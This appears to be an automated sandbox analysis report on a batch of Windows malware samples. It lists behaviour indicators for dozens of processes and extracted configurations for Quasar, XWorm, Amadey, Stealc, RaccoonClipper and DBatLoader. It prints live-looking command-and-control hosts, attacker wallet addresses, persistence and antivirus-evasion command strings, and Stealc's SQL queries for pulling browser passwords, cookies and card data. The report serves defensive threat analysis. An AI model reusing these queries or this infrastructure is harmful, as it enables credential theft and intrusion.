- cmd.exe (PID: 924)
- cmd.exe (PID: 4292)
Drops a file with a rarely used extension (PIF)
- cmd.exe (PID: 924)
Get information on the list of running processes
- cmd.exe (PID: 924)
Contacting a server suspected of hosting an Exploit Kit
- New Text Document.exe (PID: 3516)
- New Text Document.exe (PID: 2124)
The executable file from the user directory is run by the CMD process
- Pleasure.pif (PID: 5264)
Starts application with an unusual extension
- cmd.exe (PID: 924)
- cmd.exe (PID: 4292)
- cmd.exe (PID: 5392)
Runs PING.EXE to delay simulation
- cmd.exe (PID: 924)
Suspicious file concatenation
- cmd.exe (PID: 3200)
Write to the desktop.ini file (may be used to cloak folders)
- Orifaaywu.exe (PID: 5176)
Reads the date of Windows installation
- u2q0.3.exe (PID: 3300)
- u2r4.3.exe (PID: 5056)
Suspected information leak
- Orifaaywu.exe (PID: 5176)
The process checks if it is being run in the virtual environment
- dialer.exe (PID: 5884)
Process communicates with Telegram (possibly using it as an attacker's C2 server)
- Orifaaywu.exe (PID: 5176)
The mutex name appears to contain an IP address
- s.exe (PID: 4512)
The process verifies whether the antivirus software is installed
- u2q0.0.exe (PID: 4972)
Executes as Windows Service
- Omqimeq.exe (PID: 1472)
INFO
Checks supported languages
- New Text Document.bin.exe (PID: 3968)
- xie.exe (PID: 588)
- New Text Document.exe (PID: 1764)
- New Text Document.exe (PID: 1824)
- New Text Document.exe (PID: 1596)
- New Text Document.exe (PID: 2448)
- New Text Document.exe (PID: 2712)
- New Text Document.exe (PID: 2808)
- wmpnscfg.exe (PID: 1936)
- tiktok.exe (PID: 2776)
- nikto.exe (PID: 2888)
- New Text Document.exe (PID: 2836)
- build3.exe (PID: 2896)
- pei.exe (PID: 3012)
- New Text Document.exe (PID: 3028)
- build3.exe (PID: 3284)
- 1433118187.exe (PID: 3392)
- HJC.exe (PID: 3708)
- qausarneedscrypted.exe (PID: 3804)
- 3140124808.exe (PID: 3800)
- 1097519442.exe (PID: 3240)
- 1686428277.exe (PID: 1704)
- mstsca.exe (PID: 2180)
- New Text Document.exe (PID: 2480)
- 2864119237.exe (PID: 992)
- mstsca.exe (PID: 2616)
- dirtquire.exe (PID: 2588)
- steamworks.exe (PID: 3276)
- 1041810197.exe (PID: 3456)
- dfwa.exe (PID: 3368)
- Install.exe (PID: 3544)
- setup.exe (PID: 2688)
- disc.exe (PID: 1440)
- New Text Document.exe (PID: 2124)
- Amzey.exe (PID: 3060)
- FSGFvbD.exe (PID: 3312)
- amadka.exe (PID: 1900)
- cvtres.exe (PID: 580)
- maza-0.16.3-win64-setup-unsigned.exe (PID: 2012)
- mstsca.exe (PID: 1844)
- maza-0.16.3-win32-setup-unsigned.exe (PID: 2088)
- explorta.exe (PID: 2256)
- fud_new.exe (PID: 2368)
- 070.exe (PID: 3524)
- amadey.exe (PID: 2332)
- mstsca.exe (PID: 3400)
- Dctooux.exe (PID: 3368)
- is-1R2QT.tmp (PID: 3480)
- cddvdrunner2333.exe (PID: 1932)
- lie1234.exe (PID: 3256)
- RegAsm.exe (PID: 3680)
- cddvdrunner2333.exe (PID: 2564)
- 4h92v03hMhnmupQRAOq4.exe (PID: 1424)
- Dctooux.exe (PID: 1020)
- maza-qt.exe (PID: 2812)
- task.exe (PID: 3292)
- explorta.exe (PID: 3576)
- tVH4OnCbZyXaaaaXLi7l.exe (PID: 2788)
- ISetup7.exe (PID: 3528)
- RclAdIP.exe (PID: 5944)
- u2q0.0.exe (PID: 4972)
- amert.exe (PID: 5716)
- w964qHWHdOUg4N9loTJY.exe (PID: 3292)
- 5435d56940.exe (PID: 4992)
- LtFjhrz.exe (PID: 4508)
- run.exe (PID: 4800)
- New Text Document.exe (PID: 3516)
- NewB.exe (PID: 6036)
- jok.exe (PID: 4504)
- ISetup8.exe (PID: 3568)
- cbf5cbbc78.exe (PID: 5704)
- gold.exe (PID: 2088)
- toolspub1.exe (PID: 4632)
- ttt.exe (PID: 6136)
- UFCsaeI.exe (PID: 1884)
- NewB.exe (PID: 1796)
- u2r4.0.exe (PID: 4996)
- mstsca.exe (PID: 4312)
- cvtres.exe (PID: 5480)
- st200.exe (PID: 4820)
- superstart.exe (PID: 4912)
- Orifaaywu.exe (PID: 5176)
- Vqmqsfffubp.exe (PID: 4220)
- PatchesTextbook.exe (PID: 4412)
- timeSync.exe (PID: 5748)
- spixa.exe (PID: 5736)
- Spotify.exe (PID: 4436)
- ODiosFd.exe (PID: 4460)
- Pleasure.pif (PID: 5264)
- mstsca.exe (PID: 5268)
- chcp.com (PID: 5532)
- chcp.com (PID: 5360)
- u2q0.3.exe (PID: 3300)
- 4767d2e713f2021e8fe856e3ea638b58.exe (PID: 5128)
- run.exe (PID: 5680)
- s.exe (PID: 4512)
- u2r4.3.exe (PID: 5056)
Reads the computer name
- New Text Document.exe (PID: 1764)
- New Text Document.bin.exe (PID: 3968)
- xie.exe (PID: 588)
- New Text Document.exe (PID: 1824)
- New Text Document.exe (PID: 1596)
- wmpnscfg.exe (PID: 1936)
- New Text Document.exe (PID: 2448)
- New Text Document.exe (PID: 2712)
- New Text Document.exe (PID: 2808)
- New Text Document.exe (PID: 2836)
- nikto.exe (PID: 2888)
- New Text Document.exe (PID: 3028)
- pei.exe (PID: 3012)
- 1433118187.exe (PID: 3392)
- qausarneedscrypted.exe (PID: 3804)
- HJC.exe (PID: 3708)
- 1097519442.exe (PID: 3240)
- 1686428277.exe (PID: 1704)
- New Text Document.exe (PID: 2480)
- steamworks.exe (PID: 3276)
- Install.exe (PID: 3544)
- disc.exe (PID: 1440)
- New Text Document.exe (PID: 2124)
- Amzey.exe (PID: 3060)
- FSGFvbD.exe (PID: 3312)
- cvtres.exe (PID: 580)
- maza-0.16.3-win64-setup-unsigned.exe (PID: 2012)
- amadka.exe (PID: 1900)
- maza-0.16.3-win32-setup-unsigned.exe (PID: 2088)
- explorta.exe (PID: 2256)
- fud_new.exe (PID: 2368)
- is-1R2QT.tmp (PID: 3480)
- amadey.exe (PID: 2332)
- cddvdrunner2333.exe (PID: 1932)
- lie1234.exe (PID: 3256)
- Dctooux.exe (PID: 1020)
- tVH4OnCbZyXaaaaXLi7l.exe (PID: 2788)
- maza-qt.exe (PID: 2812)
- explorta.exe (PID: 3576)
- ISetup7.exe (PID: 3528)
- RclAdIP.exe (PID: 5944)
- u2q0.0.exe (PID: 4972)
- amert.exe (PID: 5716)
- w964qHWHdOUg4N9loTJY.exe (PID: 3292)
- 5435d56940.exe (PID: 4992)
- LtFjhrz.exe (PID: 4508)
- NewB.exe (PID: 6036)
- run.exe (PID: 4800)
- jok.exe (PID: 4504)
- New Text Document.exe (PID: 3516)
- ISetup8.exe (PID: 3568)
- cbf5cbbc78.exe (PID: 5704)
- UFCsaeI.exe (PID: 1884)
- Orifaaywu.exe (PID: 5176)
- st200.exe (PID: 4820)
- Vqmqsfffubp.exe (PID: 4220)
- superstart.exe (PID: 4912)
- u2r4.0.exe (PID: 4996)
- PatchesTextbook.exe (PID: 4412)
- Spotify.exe (PID: 4436)
- ODiosFd.exe (PID: 4460)
- timeSync.exe (PID: 5748)
- Pleasure.pif (PID: 5264)
- u2q0.3.exe (PID: 3300)
- run.exe (PID: 5680)
- 4767d2e713f2021e8fe856e3ea638b58.exe (PID: 5128)
- u2r4.3.exe (PID: 5056)
- s.exe (PID: 4512)
Checks proxy server information
- New Text Document.bin.exe (PID: 3968)
- xie.exe (PID: 588)
- pei.exe (PID: 3012)
- 1433118187.exe (PID: 3392)
- HJC.exe (PID: 3708)
- 1097519442.exe (PID: 3240)
- nikto.exe (PID: 2888)
- explorta.exe (PID: 2256)
- Dctooux.exe (PID: 1020)
- u2q0.0.exe (PID: 4972)
- rundll32.exe (PID: 4572)
- RclAdIP.exe (PID: 5944)
- rundll32.exe (PID: 5524)
- NewB.exe (PID: 6036)
- rundll32.exe (PID: 3680)
- ODiosFd.exe (PID: 4460)
- u2q0.3.exe (PID: 3300)
Reads the machine GUID from the registry
- New Text Document.exe (PID: 1764)
- xie.exe (PID: 588)
- New Text Document.bin.exe (PID: 3968)
- New Text Document.exe (PID: 1824)
- New Text Document.exe (PID: 1596)
- New Text Document.exe (PID: 2448)
- New Text Document.exe (PID: 2712)
- New Text Document.exe (PID: 2808)
- nikto.exe (PID: 2888)
- New Text Document.exe (PID: 3028)
- pei.exe (PID: 3012)
- New Text Document.exe (PID: 2836)
- 1433118187.exe (PID: 3392)
- qausarneedscrypted.exe (PID: 3804)
- HJC.exe (PID: 3708)
- 1097519442.exe (PID: 3240)
- New Text Document.exe (PID: 2480)
- New Text Document.exe (PID: 2124)
- disc.exe (PID: 1440)
- Install.exe (PID: 3544)
- amadka.exe (PID: 1900)
- cvtres.exe (PID: 580)
- explorta.exe (PID: 2256)
- fud_new.exe (PID: 2368)
- amadey.exe (PID: 2332)
- Dctooux.exe (PID: 1020)
- maza-qt.exe (PID: 2812)
- explorta.exe (PID: 3576)
- RclAdIP.exe (PID: 5944)
- u2q0.0.exe (PID: 4972)
- w964qHWHdOUg4N9loTJY.exe (PID: 3292)
- NewB.exe (PID: 6036)
- ISetup7.exe (PID: 3528)
- jok.exe (PID: 4504)
- New Text Document.exe (PID: 3516)
- LtFjhrz.exe (PID: 4508)
- cbf5cbbc78.exe (PID: 5704)
- st200.exe (PID: 4820)
- Orifaaywu.exe (PID: 5176)
- Vqmqsfffubp.exe (PID: 4220)
- Spotify.exe (PID: 4436)
- ODiosFd.exe (PID: 4460)
- ISetup8.exe (PID: 3568)
- u2q0.3.exe (PID: 3300)
- 4767d2e713f2021e8fe856e3ea638b58.exe (PID: 5128)
Reads Environment values
- New Text Document.exe (PID: 1764)
- xie.exe (PID: 588)
- New Text Document.exe (PID: 1824)
- New Text Document.exe (PID: 1596)
- New Text Document.exe (PID: 2448)
- New Text Document.exe (PID: 2712)
- New Text Document.exe (PID: 2808)
- New Text Document.exe (PID: 2836)
- New Text Document.exe (PID: 3028)
- qausarneedscrypted.exe (PID: 3804)
- New Text Document.exe (PID: 2480)
- disc.exe (PID: 1440)
- New Text Document.exe (PID: 2124)
- nikto.exe (PID: 2888)
- cvtres.exe (PID: 580)
- maza-qt.exe (PID: 2812)
- u2q0.0.exe (PID: 4972)
- New Text Document.exe (PID: 3516)
- jok.exe (PID: 4504)
- Orifaaywu.exe (PID: 5176)
- Vqmqsfffubp.exe (PID: 4220)
- Spotify.exe (PID: 4436)
Reads the software policy settings
- New Text Document.exe (PID: 1764)
- New Text Document.exe (PID: 1824)
- New Text Document.exe (PID: 1596)
- New Text Document.exe (PID: 2448)
- New Text Document.exe (PID: 2712)
- New Text Document.exe (PID: 2808)
- New Text Document.exe (PID: 2836)
- New Text Document.exe (PID: 3028)
- nikto.exe (PID: 2888)
- qausarneedscrypted.exe (PID: 3804)
- HJC.exe (PID: 3708)
- New Text Document.exe (PID: 2480)
- New Text Document.exe (PID: 2124)
- disc.exe (PID: 1440)
- RclAdIP.exe (PID: 5944)
- explorta.exe (PID: 3576)
- New Text Document.exe (PID: 3516)
- NewB.exe (PID: 6036)
- ODiosFd.exe (PID: 4460)
- Orifaaywu.exe (PID: 5176)
- w964qHWHdOUg4N9loTJY.exe (PID: 3292)
- cbf5cbbc78.exe (PID: 5704)
Create files in a temporary directory
- xie.exe (PID: 588)
- nikto.exe (PID: 2888)
- pei.exe (PID: 3012)
- 1433118187.exe (PID: 3392)
- qausarneedscrypted.exe (PID: 3804)
- setup.exe (PID: 2688)
- 1097519442.exe (PID: 3240)
- Amzey.exe (PID: 3060)
- Install.exe (PID: 3544)
- maza-0.16.3-win64-setup-unsigned.exe (PID: 2012)
- amadka.exe (PID: 1900)
- maza-0.16.3-win32-setup-unsigned.exe (PID: 2088)
- 070.exe (PID: 3524)
- fud_new.exe (PID: 2368)
- is-1R2QT.tmp (PID: 3480)
- amadey.exe (PID: 2332)
- Dctooux.exe (PID: 1020)
- explorta.exe (PID: 2256)
- explorta.exe (PID: 3576)
- ISetup7.exe (PID: 3528)
- amert.exe (PID: 5716)
- w964qHWHdOUg4N9loTJY.exe (PID: 3292)
- RclAdIP.exe (PID: 5944)
- NewB.exe (PID: 6036)
- LtFjhrz.exe (PID: 4508)
- cbf5cbbc78.exe (PID: 5704)
- ISetup8.exe (PID: 3568)
- st200.exe (PID: 4820)
- Orifaaywu.exe (PID: 5176)
- u2q0.3.exe (PID: 3300)
Creates files or folders in the user directory
- xie.exe (PID: 588)
- nikto.exe (PID: 2888)
- pei.exe (PID: 3012)
- build3.exe (PID: 3284)
- 1433118187.exe (PID: 3392)
- 1097519442.exe (PID: 3240)
- cvtres.exe (PID: 580)
- explorta.exe (PID: 2256)
- is-1R2QT.tmp (PID: 3480)
- maza-0.16.3-win32-setup-unsigned.exe (PID: 2088)
- Dctooux.exe (PID: 1020)
- maza-qt.exe (PID: 2812)
- RclAdIP.exe (PID: 5944)
- u2q0.0.exe (PID: 4972)
- NewB.exe (PID: 6036)
- jok.exe (PID: 4504)
- Vqmqsfffubp.exe (PID: 4220)
- PatchesTextbook.exe (PID: 4412)
- Spotify.exe (PID: 4436)
- Orifaaywu.exe (PID: 5176)
- ODiosFd.exe (PID: 4460)
Manual execution by a user
- New Text Document.exe (PID: 1824)
- New Text Document.exe (PID: 1764)
- New Text Document.exe (PID: 1596)
- wmpnscfg.exe (PID: 1936)
- New Text Document.exe (PID: 2448)
- New Text Document.exe (PID: 2712)
- New Text Document.exe (PID: 2808)
- New Text Document.exe (PID: 2836)
- New Text Document.exe (PID: 3028)
- New Text Document.exe (PID: 2480)
- EXCEL.EXE (PID: 3100)
- New Text Document.exe (PID: 2124)
- msedge.exe (PID: 5136)
- New Text Document.exe (PID: 3516)
- EXCEL.EXE (PID: 5700)
- New Text Document.exe (PID: 4772)
- New Text Document.exe (PID: 3744)
Process checks whether UAC notifications are on
- nikto.exe (PID: 2888)
Creates files in the program directory
- nikto.exe (PID: 2888)
- cddvdrunner2333.exe (PID: 1932)
- maza-0.16.3-win32-setup-unsigned.exe (PID: 2088)
- RclAdIP.exe (PID: 5944)
- u2q0.0.exe (PID: 4972)
- run.exe (PID: 4800)
- cddvdrunner2333.exe (PID: 2564)
- ODiosFd.exe (PID: 4460)
- u2q0.3.exe (PID: 3300)
- run.exe (PID: 5680)
Uses string split method (POWERSHELL)
- powershell.exe (PID: 3328)
Gets data length (POWERSHELL)
- powershell.exe (PID: 3328)
- powershell.exe (PID: 4348)
Reads product name
- nikto.exe (PID: 2888)
- u2q0.0.exe (PID: 4972)
- jok.exe (PID: 4504)
Reads CPU info
- nikto.exe (PID: 2888)
- u2q0.0.exe (PID: 4972)
- Orifaaywu.exe (PID: 5176)
- s.exe (PID: 4512)
Creates a software uninstall entry
- is-1R2QT.tmp (PID: 3480)
Dropped object may contain TOR URL's
- maza-0.16.3-win32-setup-unsigned.exe (PID: 2088)
Reads mouse settings
- tVH4OnCbZyXaaaaXLi7l.exe (PID: 2788)
- 5435d56940.exe (PID: 4992)
- Pleasure.pif (PID: 5264)
Application launched itself
- msedge.exe (PID: 3284)
- msedge.exe (PID: 764)
- msedge.exe (PID: 3744)
- msedge.exe (PID: 5136)
- chrome.exe (PID: 4520)
Reads Microsoft Office registry keys
- maza-qt.exe (PID: 2812)
Reads security settings of Internet Explorer
- rundll32.exe (PID: 4572)
- rundll32.exe (PID: 3680)
Checks whether the specified file exists (POWERSHELL)
- powershell.exe (PID: 4348)
- powershell.exe (PID: 4348)
Process checks computer location settings
- RclAdIP.exe (PID: 5944)
- ODiosFd.exe (PID: 4460)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
DBatLoader
(PID) Process(3708) HJC.exe
C2 (1)https://onedrive.live.com/download?resid=9ADCDEDB531E38FE%21107&authkey=!AIYYWqDY10e5-pU
Quasar
(PID) Process(3804) qausarneedscrypted.exe
Version1.4.1
C2 (2)185.196.10.233:4782
Sub_Dirgfgfgf
Install_Namegfdgfdg.exe
Mutexb0fcdfbd-bdd4-4a5d-8ab1-7217539d4db6
Startupfgfdhdgg
TagOffice04
LogDirLogs
SignaturesLgsAfL2UUP6AlkFtdbXqluoDW3wMwZMc5jX/AEQ95yeOqJ/mDe6i6lW/m64mbhn2G3vN2d4I8Qtdsrk2BNrFgrax6KY4LwvCADg4iWu0OQObYe1kIVp1F920nP6DUrentMm6n8M1g8s0yh5HdxXXephIuo4I5YYucMt7gcLshmgAYmxg6+d/d0YKS2VeOfF2/u6r+XgU+ilIVnN+9UjjlZXvAheUXkEbG8ebP7qHAv/DAgmZBOJhfTnATX3mUUEEUqS3oJGqmX2s1j7k/+49o+l7SkZ42evs7mYtKNHm72C...
CertificateMIIE9DCCAtygAwIBAgIQAMRnhbg+tJFMr/86nUEYyTANBgkqhkiG9w0BAQ0FADAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMCAXDTI0MDMyMzAxMzgxNVoYDzk5OTkxMjMxMjM1OTU5WjAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAwbGZcqqvx4MOD4A+auAj/30nYgYK34sYaSqurPhQwOXONfWAFNMkPIlxW0gpPAfJ2VwEMcNi...
RaccoonClipper
(PID) Process(2616) mstsca.exe
Wallets (14)Ae2tdPwUPEZDqNhACJ3ZT5NdVjkNffGAwa4Mc9N95udKWYzt1VnFngLMnPE
ltc1qa5lae8k7tzcw5lcjfvfs3n0nhf0z3cgrsz2dym
addr1qx4jwm700r2w6fneakg0r5pkg76vu7qkt6qv7zxza3qu3w9tyahu77x5a5n8nmvs78grv3a5eeupvh5qeuyv9mzpezuq60zykl
3NLzE3tXwoagBrgFsjNNkPZfrESydTD8JP
42UxohbdHGMYGPvW5Uep45Jt9Rj2WvTV958B5G5vHnawZhA4UwoD53Tafn6GRmcGdoSFUfCQN6Xm37LBZZ6qNBorFw3b6s2
t1VQgJMcNsBHsDyu1tXmJZjDpgbm3ftmTGN
LLiNjWA9h4LxVtDigLQ79xQdGiJYC4oHis
1My2QNmVqkvN5M13xk8DWftjwC9G1F2w8Z
MBD2C8QV7RDrNtSDRe9B2iH5r7yH4iMcxk
89SPVUAPHDLSq5pRdf8Eo6SLnKRJ8BNSYYnvPL6iJxGP4FBCBmkeV3CTSLCbk6uydxRnub4gLH6TBRycxSAQN2m1KcnhrSZ
bc1qx8vykfse9s9llguez9cuyjmy092yeqkesl2r5v
bnb136ns6lfw4zs5hg4n85vdthaad7hq5m4gtkgf23
DBbgRYaKG993LFJKCWz73PZqveWsnwRmGc
0xa6360e294DfCe4fE4Edf61b170c76770691aA111
XWorm
(PID) Process(580) cvtres.exe
C2gamemodz.duckdns.org:6969
Keys
AES<123456789>
Options
Splitter<Xwormmm>
Sleep time3
USB drop nameUSB.exe
MutexeqLVKldUxQjNG8e8
Amadey
(PID) Process(2256) explorta.exe
C2193.233.132.139
URLhttp://193.233.132.139/sev56rkm/index.php
Version4.20
Options
Drop directory5454e6f062
Drop nameexplorta.exe
Strings (113)explorta.exe
------
Norton
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
un:
Programs
193.233.132.139
2019
"
cred.dll|clip.dll|
rundll32
0123456789
" && ren
e1
ESET
CurrentBuild
AVG
"
Content-Type: application/octet-stream
360TotalSecurity
-%lu
#
lv:
&& Exit"
vs:
"taskkill /f /im "
<d>
\App
/sev56rkm/index.php
Sophos
ProgramData\
/Plugins/
st=s
=
+++
kernel32.dll
5454e6f062
Rem
Main
SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
abcdefghijklmnopqrstuvwxyz0123456789-_
.jpg
ps1
%-lu
exe
Content-Type: multipart/form-data; boundary=----
wb
sd:
%USERPROFILE%
VideoID
4.20
AVAST Software
SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
?scr=1
Doctor Web
av:
SOFTWARE\Microsoft\Windows NT\CurrentVersion
" && timeout 1 && del
ar:
rb
------
2022
shutdown -s -t 0
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
:::
S-%lu-
DefaultSettings.YResolution
shell32.dll
Content-Type: application/x-www-form-urlencoded
ProductName
Content-Disposition: form-data; name="data"; filename="
pc:
2016
dll
Startup
-executionpolicy remotesigned -File "
\
|
GET
Comodo
dm:
Kaspersky Lab
Panda Security
<c>
-unicode-
cmd /C RMDIR /s/q
rundll32.exe
Bitdefender
&&
&unit=
https://
cmd
bi:
/k
\0000
Avira
WinDefender
SYSTEM\ControlSet001\Services\BasicDisplay\Video
random
og:
http://
--
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
d1
os:
POST
id:
Powershell.exe
DefaultSettings.XResolution
r=
GetNativeSystemInfo
e0
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
ComputerName
(PID) Process(1020) Dctooux.exe
C2topgamecheats.dev
URLhttp://topgamecheats.dev/j4Fvskd3/index.php
Version4.18
Options
Drop directory154561dcbf
Drop nameDctooux.exe
Strings (113)Dctooux.exe
------
Norton
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
un:
Programs
2019
"
cred.dll|clip.dll|
rundll32
0123456789
" && ren
e1
ESET
CurrentBuild
AVG
"
Content-Type: application/octet-stream
360TotalSecurity
-%lu
#
lv:
&& Exit"
vs:
"taskkill /f /im "
<d>
154561dcbf
\App
Sophos
ProgramData\
/Plugins/
st=s
=
+++
kernel32.dll
Main
Rem
SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
abcdefghijklmnopqrstuvwxyz0123456789-_
.jpg
ps1
%-lu
exe
Content-Type: multipart/form-data; boundary=----
wb
sd:
%USERPROFILE%
VideoID
topgamecheats.dev
AVAST Software
/j4Fvskd3/index.php
SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
?scr=1
Doctor Web
av:
SOFTWARE\Microsoft\Windows NT\CurrentVersion
" && timeout 1 && del
ar:
rb
------
2022
shutdown -s -t 0
4.18
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
:::
S-%lu-
DefaultSettings.YResolution
shell32.dll
Content-Type: application/x-www-form-urlencoded
ProductName
Content-Disposition: form-data; name="data"; filename="
pc:
2016
dll
Startup
-executionpolicy remotesigned -File "
\
|
GET
Comodo
dm:
Kaspersky Lab
Panda Security
<c>
-unicode-
cmd /C RMDIR /s/q
rundll32.exe
Bitdefender
&&
&unit=
https://
cmd
bi:
/k
\0000
Avira
WinDefender
SYSTEM\ControlSet001\Services\BasicDisplay\Video
random
og:
http://
--
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
d1
os:
POST
id:
Powershell.exe
DefaultSettings.XResolution
r=
GetNativeSystemInfo
e0
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
ComputerName
(PID) Process(3680) rundll32.exe
C2topgamecheats.dev
Strings (2)/j4Fvskd3/index.php
topgamecheats.dev
(PID) Process(6036) NewB.exe
C2185.172.128.19
URLhttp://185.172.128.19/ghsdh39s/index.php
Version4.12
Options
Drop directorycd1f156d67
Drop nameUtsysc.exe
Strings (126)------
Norton
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
un:
Programs
2019
"
cred.dll|clip.dll|
rundll32
0123456789
" && ren
e1
ESET
CurrentBuild
AVG
"
Content-Type: application/octet-stream
360TotalSecurity
-%lu
#
Utsysc.exe
lv:
&& Exit"
" /F
vs:
"taskkill /f /im "
<d>
\App
Sophos
ProgramData\
/Plugins/
&&
..\
st=s
/Delete /TN "
=
+++
/ghsdh39s/index.php
kernel32.dll
echo Y|CACLS "
Main
Rem
SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
abcdefghijklmnopqrstuvwxyz0123456789-_
.jpg
ps1
%-lu
exe
Content-Type: multipart/form-data; boundary=----
wb
sd:
%USERPROFILE%
VideoID
185.172.128.19
/Create /SC MINUTE /MO 1 /TN
AVAST Software
SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
?scr=1
Doctor Web
av:
SOFTWARE\Microsoft\Windows NT\CurrentVersion
" && timeout 1 && del
rb
ar:
------
2022
/TR "
SCHTASKS
shutdown -s -t 0
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
:::
S-%lu-
DefaultSettings.YResolution
:N"
shell32.dll
Content-Type: application/x-www-form-urlencoded
ProductName
pc:
Content-Disposition: form-data; name="data"; filename="
2016
dll
Startup
-executionpolicy remotesigned -File "
\
|
GET
Comodo
dm:
Kaspersky Lab
Panda Security
<c>
-unicode-
cmd /C RMDIR /s/q
rundll32.exe
Bitdefender
&&
&unit=
https://
cmd
4.12
" /P "
bi:
/k
\0000
Avira
WinDefender
SYSTEM\ControlSet001\Services\BasicDisplay\Video
:F" /E
og:
http://
--
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
d1
os:
POST
id:
&&Exit
Powershell.exe
DefaultSettings.XResolution
r=
CACLS "
cd1f156d67
:R" /E
GetNativeSystemInfo
e0
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
ComputerName
Stealc
(PID) Process(4972) u2q0.0.exe
C2185.172.128.62
Strings (351)INSERT_KEY_HERE
27
05
20
24
GetProcAddress
LoadLibraryA
lstrcatA
OpenEventA
CreateEventA
CloseHandle
Sleep
GetUserDefaultLangID
VirtualAllocExNuma
VirtualFree
GetSystemInfo
VirtualAlloc
HeapAlloc
GetComputerNameA
lstrcpyA
GetProcessHeap
GetCurrentProcess
lstrlenA
ExitProcess
GlobalMemoryStatusEx
GetSystemTime
SystemTimeToFileTime
advapi32.dll
gdi32.dll
user32.dll
crypt32.dll
ntdll.dll
GetUserNameA
CreateDCA
GetDeviceCaps
ReleaseDC
CryptStringToBinaryA
sscanf
VMwareVMware
HAL9TH
JohnDoe
DISPLAY
%hu/%hu/%hu
http://185.172.128.62
/902e53a07830e030.php
/0cb78a92c463a69f/
default100
GetEnvironmentVariableA
GetFileAttributesA
GlobalLock
HeapFree
GetFileSize
GlobalSize
CreateToolhelp32Snapshot
IsWow64Process
Process32Next
GetLocalTime
FreeLibrary
GetTimeZoneInformation
GetSystemPowerStatus
GetVolumeInformationA
GetWindowsDirectoryA
Process32First
GetLocaleInfoA
GetUserDefaultLocaleName
GetModuleFileNameA
DeleteFileA
FindNextFileA
LocalFree
FindClose
SetEnvironmentVariableA
LocalAlloc
GetFileSizeEx
ReadFile
SetFilePointer
WriteFile
CreateFileA
FindFirstFileA
CopyFileA
VirtualProtect
GetLogicalProcessorInformationEx
GetLastError
lstrcpynA
MultiByteToWideChar
GlobalFree
WideCharToMultiByte
GlobalAlloc
OpenProcess
TerminateProcess
GetCurrentProcessId
gdiplus.dll
ole32.dll
bcrypt.dll
wininet.dll
shlwapi.dll
shell32.dll
psapi.dll
rstrtmgr.dll
CreateCompatibleBitmap
SelectObject
BitBlt
DeleteObject
CreateCompatibleDC
GdipGetImageEncodersSize
GdipGetImageEncoders
GdipCreateBitmapFromHBITMAP
GdiplusStartup
GdiplusShutdown
GdipSaveImageToStream
GdipDisposeImage
GdipFree
GetHGlobalFromStream
CreateStreamOnHGlobal
CoUninitialize
CoInitialize
CoCreateInstance
BCryptGenerateSymmetricKey
BCryptCloseAlgorithmProvider
BCryptDecrypt
BCryptSetProperty
BCryptDestroyKey
BCryptOpenAlgorithmProvider
GetWindowRect
GetDesktopWindow
GetDC
CloseWindow
wsprintfA
EnumDisplayDevicesA
GetKeyboardLayoutList
CharToOemW
wsprintfW
RegQueryValueExA
RegEnumKeyExA
RegOpenKeyExA
RegCloseKey
RegEnumValueA
CryptBinaryToStringA
CryptUnprotectData
SHGetFolderPathA
ShellExecuteExA
InternetOpenUrlA
InternetConnectA
InternetCloseHandle
InternetOpenA
HttpSendRequestA
HttpOpenRequestA
InternetReadFile
InternetCrackUrlA
StrCmpCA
StrStrA
StrCmpCW
PathMatchSpecA
GetModuleFileNameExA
RmStartSession
RmRegisterResources
RmGetList
RmEndSession
sqlite3_open
sqlite3_prepare_v2
sqlite3_step
sqlite3_column_text
sqlite3_finalize
sqlite3_close
sqlite3_column_bytes
sqlite3_column_blob
encrypted_key
PATH
C:\ProgramData\nss3.dll
NSS_Init
NSS_Shutdown
PK11_GetInternalKeySlot
PK11_FreeSlot
PK11_Authenticate
PK11SDR_Decrypt
C:\ProgramData\
SELECT origin_url, username_value, password_value FROM logins
browser:
profile:
url:
login:
password:
Opera
OperaGX
Network
cookies
.txt
SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
TRUE
FALSE
autofill
SELECT name, value FROM autofill
history
SELECT url FROM urls LIMIT 1000
cc
SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
name:
month:
year:
card:
Cookies
Login Data
Web Data
History
logins.json
formSubmitURL
usernameField
encryptedUsername
encryptedPassword
guid
SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
SELECT fieldname, value FROM moz_formhistory
SELECT url FROM moz_places LIMIT 1000
cookies.sqlite
formhistory.sqlite
places.sqlite
plugins
Local Extension Settings
Sync Extension Settings
IndexedDB
Opera Stable
Opera GX Stable
CURRENT
chrome-extension_
_0.indexeddb.leveldb
Local State
profiles.ini
chrome
opera
firefox
wallets
%08lX%04lX%lu
SOFTWARE\Microsoft\Windows NT\CurrentVersion
ProductName
x32
x64
%d/%d/%d %d:%d:%d
HARDWARE\DESCRIPTION\System\CentralProcessor\0
ProcessorNameString
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
DisplayName
DisplayVersion
Network Info:
- IP: IP?
- Country: ISO?
System Summary:
- HWID:
- OS:
- Architecture:
- UserName:
- Computer Name:
- Local Time:
- UTC:
- Language:
- Keyboards:
- Laptop:
- Running Path:
